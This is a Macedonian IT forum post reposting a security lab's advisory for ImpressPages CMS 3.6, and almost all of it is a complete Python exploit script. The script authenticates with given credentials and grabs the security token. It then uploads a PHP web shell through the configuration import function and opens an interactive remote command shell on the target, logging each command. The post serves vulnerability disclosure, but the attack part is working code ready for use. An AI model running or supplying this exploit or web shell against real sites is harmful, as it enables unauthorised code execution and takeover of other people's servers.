1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 1 ноември 2013.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    636
    514
    31 Мај 2010
    Код:
    #!/usr/bin/python
    #
    #
    # ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
    #
    #
    # Vendor: ImpressPages UAB
    # Product web page: http://www.impresspages.org
    # Affected version: 3.6, 3.5 and 3.1
    #
    # Summary: ImpressPages CMS is an open source web content management system with
    # revolutionary drag & drop interface.
    #
    # Desc: The vulnerability is caused due to the improper verification of uploaded
    # files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the
    # 'manage()' function (@line 65) when importing a configuration file. This can be
    # exploited to execute arbitrary PHP code by uploading a malicious PHP script file
    # that will be stored in '/file/tmp' directory after successful injection.
    # Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on)
    # for successful exploitation.
    #
    # Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
    #            GNU/Linux CentOS 6.3 (Final)
    #            Apache 2.4.2 (Win32) / Apache2
    #            PHP 5.4.7 / PHP 5.3.21
    #            MySQL 5.5.25a
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #
    # Zero Science Lab - http://www.zeroscience.mk
    # Macedonian Information Security Research And Development Laboratory
    #
    #
    # Advisory ID: ZSL-2013-5159
    # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
    #
    # Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
    #
    #
    # 12.10.2013
    #
     
    ver = '1.0.0.000251'
     
    import itertools, mimetools, mimetypes
    import cookielib, urllib, urllib2, sys
    import logging, os, time, datetime, re
     
    from colorama import Fore, Back, Style, init
    from cStringIO import StringIO
    from urllib2 import URLError
     
    init()
     
    if os.name == 'posix': os.system('clear')
    if os.name == 'nt': os.system('cls')
    piton = os.path.basename(sys.argv[0])
     
    def bannerche():
        print """
    @---------------[email protected]
    |                                                              |
    |                ImpressPages CMS 3.6 RCE 0day                |
    |                                                              |
    |                                                              |
    |                      ID: ZSL-2013-5159                      |
    |                                                              |
    |              Copyleft (c) 2013, Zero Science Lab              |
    |                                                              |
    @[email protected]
              """
        if len(sys.argv) < 3:
            print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
            print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n'
            sys.exit()
     
    bannerche()
     
    print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
     
    host = sys.argv[1]
    path = sys.argv[2]
     
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
     
    try:
        opener.open('http://'+host+'/'+path+'/admin.php')
    except urllib2.HTTPError, errorzio:
        if errorzio.code == 404:
            print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
            print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
            sys.exit()
    except URLError, errorziocvaj:
        if errorziocvaj.reason:
            print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
            print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
            sys.exit()
     
    print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
    token_chk = opener.open('http://'+host+'/'+path+'/admin.php')
    response = token_chk.read()
    match = re.search('(?<=security_token=)\w+', response)
    sectoken = match.group(0)
     
    print '\x20\x20[*] Login please.'
    username = raw_input('\x20\x20[*] Enter username: ')
    password = raw_input('\x20\x20[*] Enter password: ')
     
    login_data = urllib.urlencode({
                                'f_name' : username,
                                'f_pass' : password,
                                'action' : 'login'
                                })
     
    login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data)
    auth = login.read()
    for session in cj:
        sessid = session.name
     
    ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
    cookie = ses_chk.group(0)
     
    print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET
     
    if re.search(r'Incorrect name or password', auth):
        print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
        sys.exit()
    elif re.search(r'Your login suspended for one hour', auth):
        print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET
        sys.exit()
    else:
        print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
        print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
     
    class MultiPartForm(object):
     
        def __init__(self):
            self.form_fields = []
            self.files = []
            self.boundary = mimetools.choose_boundary()
            return
       
        def get_content_type(self):
            return 'multipart/form-data; boundary=%s' % self.boundary
     
        def add_field(self, name, value):
            self.form_fields.append((name, value))
            return
     
        def add_file(self, fieldname, filename, fileHandle, mimetype=None):
            body = fileHandle.read()
            if mimetype is None:
                mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
            self.files.append((fieldname, filename, mimetype, body))
            return
       
        def __str__(self):
     
            parts = []
            part_boundary = '--' + self.boundary
           
            parts.extend(
                [ part_boundary,
                  'Content-Disposition: form-data; name="%s"' % name,
                  '',
                  value,
                ]
                for name, value in self.form_fields
                )
           
            parts.extend(
                [ part_boundary,
                  'Content-Disposition: file; name="%s"; filename="%s"' % \
                    (field_name, filename),
                  'Content-Type: %s' % content_type,
                  '',
                  body,
                ]
                for field_name, filename, content_type, body in self.files
                )
           
            flattened = list(itertools.chain(*parts))
            flattened.append('--' + self.boundary + '--')
            flattened.append('')
            return '\r\n'.join(flattened)
     
    if __name__ == '__main__':
     
        form = MultiPartForm()
        form.add_field('spec_security_code', '12345678901234567890123456789012')
        form.add_field('spec_rand_name', 'lib_php_form_standard_1_')
       
        form.add_file('config', 'liwo.php',
                      fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
     
        request = urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken)
        request.add_header('User-agent', 'joxypoxy 1.0')
        body = str(form)
        request.add_header('Content-type', form.get_content_type())
        request.add_header('Cookie', cookie)
        request.add_header('Content-length', len(body))
        request.add_data(body)
        request.get_data()
        urllib2.urlopen(request).read()
     
    print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
    time.sleep(1)
    furl = '/admin.php?module_id=361&action=import_uploaded&security_token='
     
    def osys():
        cmd = 'uname'
        execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
        reverse = execute.read()
        if re.search(r'Linux', reverse, re.IGNORECASE):
            cmd = 'pwd'
            print Style.DIM+Fore.WHITE
            print '\n\x20\x20[*] Coins: 1'
            print '\x20\x20[*] Detected platform: Linux'
            print '\x20\x20[*] Type \'exit\' to leave'
            print '\x20\x20[*] Choose your CMDs wisely'
            print '\x20\x20[*] Your current location:'
            print Style.RESET_ALL+Fore.RESET
            return cmd
        else:
            cmd = 'cd'
            print Style.DIM+Fore.WHITE
            print '\n\x20\x20[*] Coins: 1'
            print '\x20\x20[*] Detected platform: Windows'
            print '\x20\x20[*] Type \'exit\' to leave'
            print '\x20\x20[*] Choose your CMDs wisely'
            print '\x20\x20[*] Your current location:'
            print Style.RESET_ALL+Fore.RESET
            return cmd
     
    print
     
    today = datetime.date.today()
    fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
    logging.basicConfig(filename=fname,level=logging.DEBUG)
     
    logging.info(' '+'+'*75)
    logging.info(' +')
    logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
    logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution')
    logging.info(' + Python program executed: '+sys.argv[0])
    logging.info(' + Version: '+ver)
    logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
    logging.info(' + Username input: '+username)
    logging.info(' + Password input: '+password)
    logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken)
    logging.info(' +')
    logging.info(' + Advisory ID: ZSL-2013-5159')
    logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
    logging.info(' +')
    logging.info(' '+'+'*75+'\n')
     
    print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
    while True:
        try:
            cmd = raw_input(Fore.RED+'[email protected]'+host+':~# '+Fore.RESET)
            if cmd.strip() == '':
                cmd = osys()
     
            execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
            reverse = execute.read()
            pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
     
            print Style.BRIGHT+Fore.CYAN
            cmdout = pattern.match(reverse)
            print cmdout.groups()[0].strip()
            print Style.RESET_ALL+Fore.RESET
     
            if cmd.strip() == 'exit':
                break
     
            logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
        except Exception:
            break
     
    logging.warning('\n\n END OF LOG')
    print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
    print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET
    sys.exit()
    

    http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2013-5159.php
     
    На Eva Molotow и LiquidWorm им се допаѓа ова.

Сподели

Вчитување...